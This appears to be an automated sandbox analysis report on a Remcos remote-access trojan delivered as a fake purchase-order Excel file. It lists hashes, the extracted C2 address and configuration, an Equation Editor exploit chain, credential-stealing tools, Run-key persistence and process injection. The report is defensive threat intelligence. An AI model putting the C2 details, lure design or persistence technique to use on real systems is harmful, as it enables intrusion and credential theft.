remcos | ac194ad1ef873f480d822e706f9112d392a61e2d5a23462638c4277747303f8b

Analysis

max time kernel
150s
max time network
149s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
24-04-2024 04:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

New Order - DUBAI BURJ KHALIFA LLC - PRICE ENQUIRY - RFQ 60000764690.xla.xls
Size

54KB
MD5

cd771cc01f05d97b4c739828a97f38bd
SHA1

68674eeb423ca6d1cd13dab084bcd7f7135be2af
SHA256

ac194ad1ef873f480d822e706f9112d392a61e2d5a23462638c4277747303f8b
SHA512

b419158ebcd4b4a1bca937b68eb5ce8d2bc65702a4a0bc025fed58c231eb4ab1f096581e30386fbe76e11257f9fa3f0039addf00b77a0cd82950987cb0a9f8b4
SSDEEP

768:yyBP01L1fyfjkv5s0+D5InszEABWXwMsTECYNsh1tJxiU0wE6:y681sf+5s0+D5IszWXrIEJO7tJf0wE

Score

10^/10

remcos remotehost collection persistence rat spyware stealer

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

107.172.31.178:2404

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-NVSJ5U
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

NirSoft MailPassView 3 IoCs

Password recovery tool for various email clients

Processes:

resource	yara_rule
behavioral1/memory/2440-252-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView
behavioral1/memory/2440-253-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView
behavioral1/memory/2440-274-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 3 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral1/memory/2356-247-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView
behavioral1/memory/2356-244-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView
behavioral1/memory/2356-265-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Nirsoft 9 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2356-247-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/2356-244-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/2440-252-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral1/memory/2440-253-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral1/memory/2284-258-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/2284-259-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/2284-260-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/2356-265-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/2440-274-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft

Blocklisted process makes network request 7 IoCs

Processes:

EQNEDT32.EXEWScript.exepowershell.exe

flow pid process

13 2672 EQNEDT32.EXE
16 1800 WScript.exe
18 1800 WScript.exe
20 524 powershell.exe
22 524 powershell.exe
24 524 powershell.exe
26 524 powershell.exe
Abuses OpenXML format to download file from external location
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

flow	pid	process
13	2672	EQNEDT32.EXE
16	1800	WScript.exe
18	1800	WScript.exe
20	524	powershell.exe
22	524	powershell.exe
24	524	powershell.exe
26	524	powershell.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

RegAsm.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	RegAsm.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\ProgramData\\KBKK.vbs"	powershell.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

powershell.exeRegAsm.exe

description	pid	process	target process
PID 524 set thread context of 2592	524	powershell.exe	RegAsm.exe
PID 2592 set thread context of 2356	2592	RegAsm.exe	RegAsm.exe
PID 2592 set thread context of 2440	2592	RegAsm.exe	RegAsm.exe
PID 2592 set thread context of 2284	2592	RegAsm.exe	RegAsm.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

EXCEL.EXE

description ioc process

Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
exploit

Exploitation for Client Execution
T1203

Processes:

EQNEDT32.EXE

pid process

2672 EQNEDT32.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

pid	process
2672	EQNEDT32.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXEEXCEL.EXE

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE

Modifies registry class 64 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

2684 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exeRegAsm.exe

pid process

2260 powershell.exe
524 powershell.exe
2356 RegAsm.exe
2356 RegAsm.exe
Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

RegAsm.exe

pid process

2592 RegAsm.exe
2592 RegAsm.exe
2592 RegAsm.exe

pid	process
2684	EXCEL.EXE

pid	process
2260	powershell.exe
524	powershell.exe
2356	RegAsm.exe
2356	RegAsm.exe

pid	process
2592	RegAsm.exe
2592	RegAsm.exe
2592	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exeRegAsm.exeWINWORD.EXE

description	pid	process
Token: SeDebugPrivilege	2260	powershell.exe
Token: SeDebugPrivilege	524	powershell.exe
Token: SeDebugPrivilege	2284	RegAsm.exe
Token: SeShutdownPrivilege	2644	WINWORD.EXE

Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

EXCEL.EXEWINWORD.EXE

pid process

2684 EXCEL.EXE
2684 EXCEL.EXE
2684 EXCEL.EXE
2644 WINWORD.EXE
2644 WINWORD.EXE

pid	process
2684	EXCEL.EXE
2684	EXCEL.EXE
2684	EXCEL.EXE
2644	WINWORD.EXE
2644	WINWORD.EXE

Suspicious use of WriteProcessMemory 60 IoCs

Processes:

EQNEDT32.EXEWINWORD.EXEWScript.exepowershell.exepowershell.exeRegAsm.exe

description	pid	process	target process
PID 2672 wrote to memory of 1800	2672	EQNEDT32.EXE	WScript.exe
PID 2672 wrote to memory of 1800	2672	EQNEDT32.EXE	WScript.exe
PID 2672 wrote to memory of 1800	2672	EQNEDT32.EXE	WScript.exe
PID 2672 wrote to memory of 1800	2672	EQNEDT32.EXE	WScript.exe
PID 2644 wrote to memory of 1248	2644	WINWORD.EXE	splwow64.exe
PID 2644 wrote to memory of 1248	2644	WINWORD.EXE	splwow64.exe
PID 2644 wrote to memory of 1248	2644	WINWORD.EXE	splwow64.exe
PID 2644 wrote to memory of 1248	2644	WINWORD.EXE	splwow64.exe
PID 1800 wrote to memory of 2260	1800	WScript.exe	powershell.exe
PID 1800 wrote to memory of 2260	1800	WScript.exe	powershell.exe
PID 1800 wrote to memory of 2260	1800	WScript.exe	powershell.exe
PID 1800 wrote to memory of 2260	1800	WScript.exe	powershell.exe
PID 2260 wrote to memory of 524	2260	powershell.exe	powershell.exe
PID 2260 wrote to memory of 524	2260	powershell.exe	powershell.exe
PID 2260 wrote to memory of 524	2260	powershell.exe	powershell.exe
PID 2260 wrote to memory of 524	2260	powershell.exe	powershell.exe
PID 524 wrote to memory of 2888	524	powershell.exe	cmd.exe
PID 524 wrote to memory of 2888	524	powershell.exe	cmd.exe
PID 524 wrote to memory of 2888	524	powershell.exe	cmd.exe
PID 524 wrote to memory of 2888	524	powershell.exe	cmd.exe
PID 524 wrote to memory of 2592	524	powershell.exe	RegAsm.exe
PID 524 wrote to memory of 2592	524	powershell.exe	RegAsm.exe
PID 524 wrote to memory of 2592	524	powershell.exe	RegAsm.exe
PID 524 wrote to memory of 2592	524	powershell.exe	RegAsm.exe
PID 524 wrote to memory of 2592	524	powershell.exe	RegAsm.exe
PID 524 wrote to memory of 2592	524	powershell.exe	RegAsm.exe
PID 524 wrote to memory of 2592	524	powershell.exe	RegAsm.exe
PID 524 wrote to memory of 2592	524	powershell.exe	RegAsm.exe
PID 524 wrote to memory of 2592	524	powershell.exe	RegAsm.exe
PID 524 wrote to memory of 2592	524	powershell.exe	RegAsm.exe
PID 524 wrote to memory of 2592	524	powershell.exe	RegAsm.exe
PID 524 wrote to memory of 2592	524	powershell.exe	RegAsm.exe
PID 524 wrote to memory of 2592	524	powershell.exe	RegAsm.exe
PID 524 wrote to memory of 2592	524	powershell.exe	RegAsm.exe
PID 524 wrote to memory of 2592	524	powershell.exe	RegAsm.exe
PID 524 wrote to memory of 2592	524	powershell.exe	RegAsm.exe
PID 2592 wrote to memory of 2356	2592	RegAsm.exe	RegAsm.exe
PID 2592 wrote to memory of 2356	2592	RegAsm.exe	RegAsm.exe
PID 2592 wrote to memory of 2356	2592	RegAsm.exe	RegAsm.exe
PID 2592 wrote to memory of 2356	2592	RegAsm.exe	RegAsm.exe
PID 2592 wrote to memory of 2356	2592	RegAsm.exe	RegAsm.exe
PID 2592 wrote to memory of 2356	2592	RegAsm.exe	RegAsm.exe
PID 2592 wrote to memory of 2356	2592	RegAsm.exe	RegAsm.exe
PID 2592 wrote to memory of 2356	2592	RegAsm.exe	RegAsm.exe
PID 2592 wrote to memory of 2440	2592	RegAsm.exe	RegAsm.exe
PID 2592 wrote to memory of 2440	2592	RegAsm.exe	RegAsm.exe
PID 2592 wrote to memory of 2440	2592	RegAsm.exe	RegAsm.exe
PID 2592 wrote to memory of 2440	2592	RegAsm.exe	RegAsm.exe
PID 2592 wrote to memory of 2440	2592	RegAsm.exe	RegAsm.exe
PID 2592 wrote to memory of 2440	2592	RegAsm.exe	RegAsm.exe
PID 2592 wrote to memory of 2440	2592	RegAsm.exe	RegAsm.exe
PID 2592 wrote to memory of 2440	2592	RegAsm.exe	RegAsm.exe
PID 2592 wrote to memory of 2284	2592	RegAsm.exe	RegAsm.exe
PID 2592 wrote to memory of 2284	2592	RegAsm.exe	RegAsm.exe
PID 2592 wrote to memory of 2284	2592	RegAsm.exe	RegAsm.exe
PID 2592 wrote to memory of 2284	2592	RegAsm.exe	RegAsm.exe
PID 2592 wrote to memory of 2284	2592	RegAsm.exe	RegAsm.exe
PID 2592 wrote to memory of 2284	2592	RegAsm.exe	RegAsm.exe
PID 2592 wrote to memory of 2284	2592	RegAsm.exe	RegAsm.exe
PID 2592 wrote to memory of 2284	2592	RegAsm.exe	RegAsm.exe

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\New Order - DUBAI BURJ KHALIFA LLC - PRICE ENQUIRY - RFQ 60000764690.xla.xls"
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2684

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2644

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:1248

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2672

C:\Windows\SysWOW64\WScript.exe
